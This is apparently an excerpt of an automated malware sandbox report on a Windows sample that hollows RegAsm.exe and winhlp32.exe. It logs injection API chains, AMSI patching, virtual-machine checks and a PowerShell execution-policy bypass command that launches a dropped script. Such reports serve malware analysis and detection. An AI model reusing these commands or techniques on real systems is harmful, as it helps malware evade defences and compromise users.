        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4FF0000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1450000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1480000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\winhlp32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_0041A748
        Source: C:\Windows\winhlp32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,19_2_0041A748
        Source: C:\Windows\winhlp32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,21_2_0041A748
        Source: C:\Windows\winhlp32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,23_2_0041A748
        Source: C:\Windows\winhlp32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,27_2_0041A748
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2852Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7003Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3445
        Source: C:\Windows\winhlp32.exeWindow / User API: threadDelayed 6473
        Source: C:\Windows\winhlp32.exeWindow / User API: threadDelayed 3519
        Source: C:\Windows\SysWOW64\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dynwrapx.dllJump to dropped file
        Source: C:\Windows\winhlp32.exeAPI coverage: 6.2 %
        Source: C:\Windows\winhlp32.exeAPI coverage: 6.2 %
        Source: C:\Windows\winhlp32.exeAPI coverage: 6.2 %
        Source: C:\Windows\winhlp32.exeAPI coverage: 6.0 %
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3504Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3448Thread sleep time: -15679732462653109s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4112Thread sleep count: 2852 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4112Thread sleep count: 7003 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6132Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6600Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3140Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2132Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\winhlp32.exe TID: 2072Thread sleep count: 6473 > 30
        Source: C:\Windows\winhlp32.exe TID: 2072Thread sleep time: -19419000s >= -30000s
        Source: C:\Windows\winhlp32.exe TID: 2072Thread sleep count: 3519 > 30
        Source: C:\Windows\winhlp32.exe TID: 2072Thread sleep time: -10557000s >= -30000s
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeFile Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\SysWOW64\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
        Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs FullSizeInformation
        Source: C:\Windows\SysWOW64\wscript.exeFile Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\SysWOW64\wscript.exeFile Volume queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs FullSizeInformation
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409253
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C291
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C34D
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409665
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0044E879 FindFirstFileExA,17_2_0044E879
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_0040880C
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040783C FindFirstFileW,FindNextFileW,17_2_0040783C
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419AF5
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD37
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_00409253
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,19_2_0041C291
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,19_2_0040C34D
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_00409665
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0044E879 FindFirstFileExA,19_2_0044E879
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,19_2_0040880C
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040783C FindFirstFileW,FindNextFileW,19_2_0040783C
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,19_2_00419AF5
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0040BD37
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,21_2_00409253
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,21_2_0041C291
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,21_2_0040C34D
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,21_2_00409665
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0044E879 FindFirstFileExA,21_2_0044E879
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,21_2_0040880C
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040783C FindFirstFileW,FindNextFileW,21_2_0040783C
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,21_2_00419AF5
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,21_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,21_2_0040BD37
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_00409253
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,23_2_0041C291
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,23_2_0040C34D
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_00409665
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0044E879 FindFirstFileExA,23_2_0044E879
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,23_2_0040880C
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040783C FindFirstFileW,FindNextFileW,23_2_0040783C
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,23_2_00419AF5
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,23_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,23_2_0040BD37
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409253
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,27_2_0041C291
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,27_2_0040C34D
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409665
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0044E879 FindFirstFileExA,27_2_0044E879
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,27_2_0040880C
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040783C FindFirstFileW,FindNextFileW,27_2_0040783C
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,27_2_00419AF5
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,27_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,27_2_0040BD37
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407C97
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData
        Source: RegAsm.exe, 00000004.00000002.3316798522.0000000005337000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3306976580.00000000010A1000.00000004.00000020.00020000.00000000.sdmp, winhlp32.exe, 00000011.00000003.2300656091.0000000002FD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: winhlp32.exe, 00000011.00000003.2300656091.0000000002FD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
        Source: RegAsm.exe, 00000004.00000002.3316213754.00000000052ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
        Source: RegAsm.exe, 00000004.00000002.3307841453.0000000001150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
        Source: C:\Windows\winhlp32.exeAPI call chain: ExitProcess graph end nodegraph_17-48922
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\winhlp32.exeCode function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004349F9
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
        Source: C:\Windows\winhlp32.exeCode function: 17_2_004432B5 mov eax, dword ptr fs:[00000030h]17_2_004432B5
        Source: C:\Windows\winhlp32.exeCode function: 19_2_004432B5 mov eax, dword ptr fs:[00000030h]19_2_004432B5
        Source: C:\Windows\winhlp32.exeCode function: 21_2_004432B5 mov eax, dword ptr fs:[00000030h]21_2_004432B5
        Source: C:\Windows\winhlp32.exeCode function: 23_2_004432B5 mov eax, dword ptr fs:[00000030h]23_2_004432B5
        Source: C:\Windows\winhlp32.exeCode function: 27_2_004432B5 mov eax, dword ptr fs:[00000030h]27_2_004432B5
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00412077 GetProcessHeap,HeapFree,17_2_00412077
        Source: C:\Windows\winhlp32.exeCode function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004349F9
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00434B47 SetUnhandledExceptionFilter,17_2_00434B47
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0043BB22
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00434FDC
        Source: C:\Windows\winhlp32.exeCode function: 19_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_004349F9
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00434B47 SetUnhandledExceptionFilter,19_2_00434B47
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0043BB22
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00434FDC
        Source: C:\Windows\winhlp32.exeCode function: 21_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_004349F9
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00434B47 SetUnhandledExceptionFilter,21_2_00434B47
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0043BB22
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00434FDC
        Source: C:\Windows\winhlp32.exeCode function: 23_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_004349F9
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00434B47 SetUnhandledExceptionFilter,23_2_00434B47
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0043BB22
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00434FDC
        Source: C:\Windows\winhlp32.exeCode function: 27_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_004349F9
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00434B47 SetUnhandledExceptionFilter,27_2_00434B47
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0043BB22
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00434FDC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        .NET source code references suspicious native API functions
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Win32.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Win32.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Amsi.csReference to suspicious API methods: Win32.VirtualAllocEx(procAddress, (UIntPtr)(ulong)patch.Length, 64u, out var _)
        Allocates memory in foreign processes
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Bypasses PowerShell execution policy
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Contains functionality to inject code into remote processes
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_05660054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_05660054
        Injects a PE file into a foreign processes
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
